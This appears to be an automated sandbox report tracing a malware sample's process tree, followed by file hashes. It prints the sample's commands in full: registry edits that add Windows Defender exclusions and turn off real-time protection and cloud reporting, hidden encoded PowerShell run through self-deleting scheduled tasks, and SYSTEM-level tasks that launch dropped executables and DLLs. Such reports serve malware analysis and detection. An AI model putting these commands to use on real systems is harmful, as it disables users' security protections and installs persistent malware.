\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:1676
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:1156
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:904 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:808 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:1628
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:1768
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gltVvHJTC" /SC once /ST 00:57:03 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:636
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gltVvHJTC"4⤵PID:1952
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gltVvHJTC"4⤵PID:1736
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bqPrGzjNEdzQQUiKbx" /SC once /ST 07:24:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\kcruyFmhpDOqNnXOb\YbiwpHNgaXHXhkn\UNiJltb.exe\" SB /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1088
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {015E51ED-CBEC-4DC5-9D43-E50247348F77} S-1-5-21-1214520366-621468234-4062160515-1000:VDWSWJJD\Admin:Interactive:[1]1⤵PID:1960
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1568 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1348
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1216 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1356
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1808 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1700
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1500 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1832
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1172
-
C:\Windows\system32\taskeng.exetaskeng.exe {CADE98F5-760A-4EE9-96F3-A1876B30C97F} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1676
-
C:\Users\Admin\AppData\Local\Temp\kcruyFmhpDOqNnXOb\YbiwpHNgaXHXhkn\UNiJltb.exeC:\Users\Admin\AppData\Local\Temp\kcruyFmhpDOqNnXOb\YbiwpHNgaXHXhkn\UNiJltb.exe SB /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1156 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gtlWFOfeb" /SC once /ST 00:49:09 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:712
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gtlWFOfeb"3⤵PID:2024
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gtlWFOfeb"3⤵PID:1608
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:1888
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:1552
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:1108
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:1764
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gVmTNioxm" /SC once /ST 03:14:37 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:2028
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gVmTNioxm"3⤵PID:1572
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gVmTNioxm"3⤵PID:1504
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\aEAhOyLGAJEeHmSw" /t REG_DWORD /d 0 /reg:323⤵PID:1100
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\aEAhOyLGAJEeHmSw" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:700
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\aEAhOyLGAJEeHmSw" /t REG_DWORD /d 0 /reg:643⤵PID:1664
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\aEAhOyLGAJEeHmSw" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1616
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\aEAhOyLGAJEeHmSw" /t REG_DWORD /d 0 /reg:323⤵PID:1692
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\aEAhOyLGAJEeHmSw" /t REG_DWORD /d 0 /reg:324⤵PID:1348
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\aEAhOyLGAJEeHmSw" /t REG_DWORD /d 0 /reg:643⤵PID:1636
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\aEAhOyLGAJEeHmSw" /t REG_DWORD /d 0 /reg:644⤵PID:808
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\aEAhOyLGAJEeHmSw\fVcrHaEd\emHVTnGMQSXEiEMZ.wsf"3⤵PID:1968
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\aEAhOyLGAJEeHmSw\fVcrHaEd\emHVTnGMQSXEiEMZ.wsf"3⤵
- Modifies data under HKEY_USERS
PID:904 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DSoIyVzZU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1176
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DSoIyVzZU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1360
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LffyXglieFfFoFiacpR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1252
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LffyXglieFfFoFiacpR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:900
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MDIoNgUDyTUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2016
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MDIoNgUDyTUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1700
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NfNiqhmdbjMU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:548
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NfNiqhmdbjMU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:700
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pUFhDAsVKPgbC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:536
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pUFhDAsVKPgbC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:272
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\dmGirQmnfsEKeFVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1940
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\dmGirQmnfsEKeFVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:924
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\kcruyFmhpDOqNnXOb" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:552
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\kcruyFmhpDOqNnXOb" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:636
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\aEAhOyLGAJEeHmSw" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1752
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\aEAhOyLGAJEeHmSw" /t REG_DWORD /d 0 /reg:644⤵PID:1252
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DSoIyVzZU" /t REG_DWORD /d 0 /reg:324⤵PID:1992
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DSoIyVzZU" /t REG_DWORD /d 0 /reg:644⤵PID:1952
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LffyXglieFfFoFiacpR" /t REG_DWORD /d 0 /reg:324⤵PID:1708
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LffyXglieFfFoFiacpR" /t REG_DWORD /d 0 /reg:644⤵PID:876
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MDIoNgUDyTUn" /t REG_DWORD /d 0 /reg:324⤵PID:1192
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MDIoNgUDyTUn" /t REG_DWORD /d 0 /reg:644⤵PID:1552
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NfNiqhmdbjMU2" /t REG_DWORD /d 0 /reg:324⤵PID:1092
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NfNiqhmdbjMU2" /t REG_DWORD /d 0 /reg:644⤵PID:808
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pUFhDAsVKPgbC" /t REG_DWORD /d 0 /reg:324⤵PID:1968
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pUFhDAsVKPgbC" /t REG_DWORD /d 0 /reg:644⤵PID:336
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\dmGirQmnfsEKeFVB" /t REG_DWORD /d 0 /reg:324⤵PID:1840
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\dmGirQmnfsEKeFVB" /t REG_DWORD /d 0 /reg:644⤵PID:1176
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\kcruyFmhpDOqNnXOb" /t REG_DWORD /d 0 /reg:324⤵PID:1680
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\aEAhOyLGAJEeHmSw" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1252
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\aEAhOyLGAJEeHmSw" /t REG_DWORD /d 0 /reg:644⤵PID:1164
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\kcruyFmhpDOqNnXOb" /t REG_DWORD /d 0 /reg:644⤵PID:1704
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gOGxAKUXR" /SC once /ST 05:57:48 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1952
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gOGxAKUXR"3⤵PID:1708
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gOGxAKUXR"3⤵PID:1328
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:1400
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:1604
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:1840
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:1176
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "djBZseDcsfXCKCDwv" /SC once /ST 03:04:33 /RU "SYSTEM" /TR "\"C:\Windows\Temp\aEAhOyLGAJEeHmSw\szBOslxPrfcYsHL\bSTmkGM.exe\" fT /site_id 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:616
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "djBZseDcsfXCKCDwv"3⤵PID:1680
-
-
-
C:\Windows\Temp\aEAhOyLGAJEeHmSw\szBOslxPrfcYsHL\bSTmkGM.exeC:\Windows\Temp\aEAhOyLGAJEeHmSw\szBOslxPrfcYsHL\bSTmkGM.exe fT /site_id 525403 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1732 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bqPrGzjNEdzQQUiKbx"3⤵PID:1252
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:1372
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:516
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:1952
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:588
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\DSoIyVzZU\uCniCI.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "knFkktILFVnIDkr" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:700
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "knFkktILFVnIDkr2" /F /xml "C:\Program Files (x86)\DSoIyVzZU\TRAiBAU.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:692
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "knFkktILFVnIDkr"3⤵PID:1104
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "knFkktILFVnIDkr"3⤵PID:1832
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "BlInLNiubYyoAx" /F /xml "C:\Program Files (x86)\NfNiqhmdbjMU2\KCPCDUW.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:336
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "whKjBYvLakBMN2" /F /xml "C:\ProgramData\dmGirQmnfsEKeFVB\EiiSmSH.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1016
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ZEXgxGmXwSWrIpkpt2" /F /xml "C:\Program Files (x86)\LffyXglieFfFoFiacpR\FhnFZow.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:940
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "axLPrkrREnFsrxejedd2" /F /xml "C:\Program Files (x86)\pUFhDAsVKPgbC\CXKqEBb.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:568
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "nCFnhfHwXtGOFkPnU" /SC once /ST 03:10:50 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\aEAhOyLGAJEeHmSw\sRJkaRvz\yveuekQ.dll\",#1 /site_id 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1256
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "nCFnhfHwXtGOFkPnU"3⤵PID:712
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:1636
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:324⤵PID:1104
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:824
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵PID:1328
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "djBZseDcsfXCKCDwv"3⤵PID:2024
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\aEAhOyLGAJEeHmSw\sRJkaRvz\yveuekQ.dll",#1 /site_id 5254032⤵PID:1992
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\aEAhOyLGAJEeHmSw\sRJkaRvz\yveuekQ.dll",#1 /site_id 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:1252 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "nCFnhfHwXtGOFkPnU"4⤵PID:1440
-
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1596
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:900
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1940
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5fbaf46aaceab6b69d16de8e7ba3582d0
SHA11d23266ea9965e180e0927eb4ba7f7f8af0ebf8c
SHA256e69964cd012b9885d1de86766d4d4941a3334364caa76235b1888b211a63ddf5
SHA512612b20792c04d84b8ebb433722ac8f856d38f9619eb9943d3f75010d5f3389e4b1aad8d825bcec9f6dde7b046fa5bfa10250e8d4d5dc67dd814d4b63fe7fbde8
-
Filesize
2KB
MD55b205dead634c20e33e1749070fe6845
SHA1f37c295d596a0d1601b20562b2424cdcca895527
SHA256742b953c2794869c6d629ce096aa805902cfd43f399bb610d66c8926dceaf59b
SHA512f502d72265aaad9679340c3017c597f947cc43c84ca49773b7ec6b69bf81ab0f69b2991f6916361c6a2fde71c5da61ca0ca269b6ed7cdfaaa794d9c5da1bac2a
-
Filesize
2KB
MD5bb34d54b808da49123ede1c02f595eeb
SHA12a5e04e12bc3029116731803c952302e08ea4090
SHA2565f26329f8fc09f3f5becbc7e212d9e0a98fd2e63eccf8965c08fd0dea1bfbe4e
SHA5128ec667be55af2417fced4037ebfcc0f6618d6dc6bba8085d9de96df43753f6828d0fd69f69bfb30e8158b7569d4317168df28b633199a1c22d36cc792fc44cb2
-
Filesize
2KB
